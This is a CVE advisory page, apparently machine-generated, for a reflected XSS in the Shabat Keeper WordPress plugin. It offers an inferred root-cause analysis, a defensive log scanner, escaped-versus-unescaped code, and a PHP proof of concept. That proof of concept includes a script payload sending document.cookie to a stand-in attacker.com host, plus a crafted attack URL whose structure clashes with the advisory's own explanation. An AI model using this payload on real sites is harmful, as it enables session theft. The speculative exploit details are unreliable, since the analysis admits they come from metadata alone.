Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-13701: Shabat Keeper <= 0.4.4 – Reflected Cross-Site Scripting via $_SERVER['PHP_SELF'] (shabat-keeper)

Plugin: shabat-keeper
Severity: Medium (CVSS 6.1)
CWE: 79
Vulnerable Version: 0.4.4
Patched Version:
Disclosed: January 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-13701 (metadata-based):
This vulnerability is a reflected cross-site scripting (XSS) flaw in the Shabat Keeper WordPress plugin. It affects all plugin versions up to and including 0.4.4. Attackers can inject arbitrary JavaScript via the $_SERVER['PHP_SELF'] superglobal. The CVSS 3.1 score of 6.1 (Medium severity) reflects the attack's network accessibility, low complexity, and requirement for user interaction.

Atomic Edge research identifies the root cause as insufficient input sanitization and output escaping of the $_SERVER['PHP_SELF'] superglobal. WordPress plugins commonly use this variable to generate self-referencing URLs or form actions. The plugin likely echoes this variable directly into HTML output without proper escaping. This conclusion is inferred from the CWE-79 classification and the vulnerability description; no source code confirmation is possible because the vulnerable plugin version is unavailable for download.

Exploitation requires an attacker to craft a malicious link containing a JavaScript payload within the PHP_SELF value. The victim must click the link while authenticated to WordPress. The attack vector is reflected XSS, meaning the payload executes immediately in the victim's browser context. A typical payload would be alert(document.cookie) or similar JavaScript to steal session cookies. The exact endpoint is unknown but likely involves a plugin administration page that improperly echoes $_SERVER['PHP_SELF'].
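Because the crafted link described above rides on the extra path segment that PHP appends to PHP_SELF as PATH_INFO, a defender can screen the web server access log for requests of that shape. The following is an added example, not part of the Atomic Edge PoC; the log lines, addresses and user agents are constructed.

```php
<?php
// Added example (not Atomic Edge's PoC): flag requests that carry extra path
// segments after a .php script. PHP exposes that tail as PATH_INFO and appends
// it to $_SERVER['PHP_SELF'], which is the value the plugin reflects.
declare(strict_types=1);

// Constructed combined-format log lines; addresses and agents are placeholders.
const SAMPLE_LOG = <<<'LOG'
198.51.100.7 - - [18/Mar/2026:10:00:01 +0000] "GET /wp-admin/admin.php?page=shabat-keeper HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Mar/2026:10:00:09 +0000] "GET /wp-admin/admin.php/%22%3E%3Cscript%3Ealert(1)%3C/script%3E?page=shabat-keeper HTTP/1.1" 200 5211 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Mar/2026:10:01:15 +0000] "GET /wp-admin/admin.php/foo/bar HTTP/1.1" 200 4999 "-" "curl/8.0"
203.0.113.5 - - [18/Mar/2026:10:02:00 +0000] "GET /wp-content/plugins/shabat-keeper/readme.txt HTTP/1.1" 404 210 "-" "curl/8.0"
LOG;

// Returns the decoded PATH_INFO when it contains characters that can close an
// HTML attribute or open a tag, otherwise null (plain path-info is not flagged).
function suspicious_path_info(string $line): ?string
{
    if (!preg_match('/"[A-Z]+ (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return null;                      // not a request line we understand
    }
    $path = parse_url($m[1], PHP_URL_PATH);
    if (!is_string($path) || !preg_match('#\.php/(.+)$#', $path, $tail)) {
        return null;                      // no path segment after the script
    }
    $info = rawurldecode($tail[1]);       // the server decodes it before reflecting
    return preg_match('/[<>"\']/', $info) === 1 ? $info : null;
}

// Map of 1-based line number => flagged PATH_INFO for every hit in the log.
function scan_log(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $i => $line) {
        $info = suspicious_path_info($line);
        if ($info !== null) {
            $hits[$i + 1] = $info;
        }
    }
    return $hits;
}

foreach (scan_log(SAMPLE_LOG) as $lineno => $info) {
    printf("line %d: markup in PATH_INFO: %s\n", $lineno, $info);
}
```

Only the second sample line is reported; ordinary path-info such as /admin.php/foo/bar is left alone to keep the check low-noise.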

Remediation requires proper output escaping. The plugin should use WordPress escaping functions like esc_url() or esc_attr() before echoing $_SERVER['PHP_SELF'] into HTML attributes or URLs. Input sanitization of superglobals is generally unnecessary because they are server-defined. The primary fix is output escaping on all instances where this variable is printed. A patched version should also validate that the echoed value conforms to expected URL formats.
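The inferred unescaped pattern beside its escaped form, as an added example that is not the plugin's code (the plugin source was unavailable to the analysis). Note that PHP builds PHP_SELF from the script path plus any trailing PATH_INFO, so the tail of the value comes from the request URL; esc_attr() and admin_url() are WordPress core, and the htmlspecialchars() fallback here stands in for esc_attr() only when the script runs outside WordPress.

```php
<?php
// Added example, not the plugin's code (its source was unavailable to the
// analysis): the unescaped pattern the advisory infers, beside the escaped form.
// PHP builds PHP_SELF from the script path plus any trailing PATH_INFO, so the
// tail of the value comes straight from the request URL.
declare(strict_types=1);

// Constructed sample: what PHP_SELF holds for a request to
// /wp-admin/admin.php/"><i>injected</i>?page=shabat-keeper
const SAMPLE_PHP_SELF = '/wp-admin/admin.php/"><i>injected</i>';

// Vulnerable pattern: the raw value lands inside an attribute.
function render_form_vulnerable(string $php_self): string
{
    return '<form method="post" action="' . $php_self . '"></form>';
}

// esc_attr() is WordPress core. Outside WordPress this stand-in uses the
// htmlspecialchars() call it is built on, for demonstration only.
function attr_escape(string $value): string
{
    if (function_exists('esc_attr')) {
        return esc_attr($value);
    }
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Fixed pattern: escape for the attribute context at output time. Inside
// WordPress, esc_url(admin_url('admin.php?page=shabat-keeper')) avoids
// reflecting PHP_SELF at all and is the preferable form.
function render_form_fixed(string $php_self): string
{
    return '<form method="post" action="' . attr_escape($php_self) . '"></form>';
}

// Review check: count tag openers; a contained attribute yields exactly 2
// (<form and </form>), any extra tag means the value escaped the attribute.
function tag_count(string $html): int
{
    return preg_match_all('#<[a-zA-Z/]#', $html);
}

foreach (['vulnerable' => render_form_vulnerable(SAMPLE_PHP_SELF),
          'fixed'      => render_form_fixed(SAMPLE_PHP_SELF)] as $label => $html) {
    printf("%-10s tags=%d  %s\n", $label, tag_count($html), $html);
}
```

Run with the PHP CLI: the vulnerable rendering reports 4 tags because the injected &lt;i&gt; element escapes the action attribute, the fixed rendering reports 2.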

Successful exploitation allows attackers to execute arbitrary JavaScript in the context of an authenticated WordPress user. This can lead to session hijacking if administrative cookies are captured. Attackers could perform actions on behalf of the victim, such as changing plugin settings or creating new administrative users. The impact scope is limited to the privileges of the user who clicks the malicious link. Unauthenticated users cannot be directly targeted, but they could be tricked into performing actions if they have an active session.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-13701 - Shabat Keeper <= 0.4.4 - Reflected Cross-Site Scripting via $_SERVER['PHP_SELF']
/**
 * Proof of Concept for CVE-2025-13701
 * This script demonstrates a reflected XSS attack against the Shabat Keeper plugin.
 * The exact vulnerable endpoint is unknown, but the attack targets $_SERVER['PHP_SELF'] parameter reflection.
 * Assumptions:
 * 1. The plugin has an admin page that echoes $_SERVER['PHP_SELF'] without escaping.
 * 2. The page is accessible via GET request.
 * 3. The payload executes in the browser of an authenticated WordPress user.
 */

$target_url = 'http://vulnerable-wordpress-site.com/wp-admin/admin.php?page=shabat-keeper';

// Malicious payload to steal session cookies
$payload = '<script>fetch("https://attacker.com/steal?c="+encodeURIComponent(document.cookie))</script>';

// Construct the attack URL.
// In a real attack, the payload would be part of the path that populates $_SERVER['PHP_SELF']
// Since we cannot control the server variable directly, this PoC simulates the attack vector.
// Actual exploitation requires the victim to visit a crafted URL where the path contains the payload.
echo "[+] Target: " . $target_url . "\n";
echo "[+] Payload: " . $payload . "\n";
echo "[!] This is a simulated PoC. Actual exploitation requires a malicious link like:\n";
echo "http://vulnerable-wordpress-site.com/wp-admin/" . urlencode($payload) . "/admin.php?page=shabat-keeper\n";

// Example cURL request to test if the endpoint exists (without payload)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code === 200) {
    echo "[+] Endpoint responded with HTTP 200. Potential vulnerability may exist.\n";
} else {
    echo "[-] Endpoint responded with HTTP " . $http_code . ". Vulnerability may not be present or page requires authentication.\n";
}
?>
